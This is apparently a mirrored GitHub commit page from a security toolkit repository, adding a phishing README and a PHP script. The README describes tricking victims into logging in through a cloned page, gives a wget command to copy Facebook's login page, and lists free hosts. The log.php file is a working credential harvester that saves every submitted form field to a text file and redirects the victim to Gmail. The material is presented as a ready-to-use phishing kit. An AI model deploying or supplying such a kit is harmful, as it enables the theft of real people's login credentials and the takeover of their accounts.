mirror of
https://github.com/autistic-symposium/sec-pentesting-toolkit.git
synced 2025-08-18 19:27:59 -04:00
docs: Clean up resources for Hackoctoberfest 2019 (#41)
* Clean up resources for Hackoctoberfest 2019
* 👩🏾🦱 Add cloud hacking readme
This commit is contained in:
parent
746d808fc0
commit
9ed0254149
458 changed files with 9658 additions and 57 deletions
26
Web_Hacking/Phishing/README.md
Normal file
26
Web_Hacking/Phishing/README.md
Normal file
|
@ -0,0 +1,26 @@
|
|||
# Phishing
|
||||
|
||||
* Way of deceiving your victim by making him/her login through one of your webpages which is the clone of the original.
|
||||
|
||||
* Fake login/scamming pages which are often to hack identification information.
|
||||
|
||||
## Tools
|
||||
|
||||
|
||||
|
||||
### Cloning a Login Page
|
||||
|
||||
```
|
||||
$ wget -U "Mozilla/5.0" -mkL http://facebook.com
|
||||
```
|
||||
|
||||
### Free Hostings:
|
||||
|
||||
- http://www.my3gb.com/
|
||||
- http://110mb.com/
|
||||
- http://www.freehostia.com/
|
||||
- http://www.awardspace.com/
|
||||
- http://prohosts.org/
|
||||
- http://www.000webhost.com/
|
||||
- http://www.atspace.com/
|
||||
- http://zymic.com/
|
13
Web_Hacking/Phishing/log.php
Normal file
13
Web_Hacking/Phishing/log.php
Normal file
|
@ -0,0 +1,13 @@
|
|||
<?php
|
||||
header ('Location:http://www.gmail.com');
|
||||
$handle = fopen("log.txt", "a");
|
||||
foreach($_POST as $variable => $value) {
|
||||
fwrite($handle, $variable);
|
||||
fwrite($handle, "=");
|
||||
fwrite($handle, $value);
|
||||
fwrite($handle, "\r\n"); }
|
||||
fwrite($handle,"\r\n");
|
||||
fclose($handle);
|
||||
exit;
|
||||
?>
|
||||
|
Loading…
Add table
Add a link
Reference in a new issue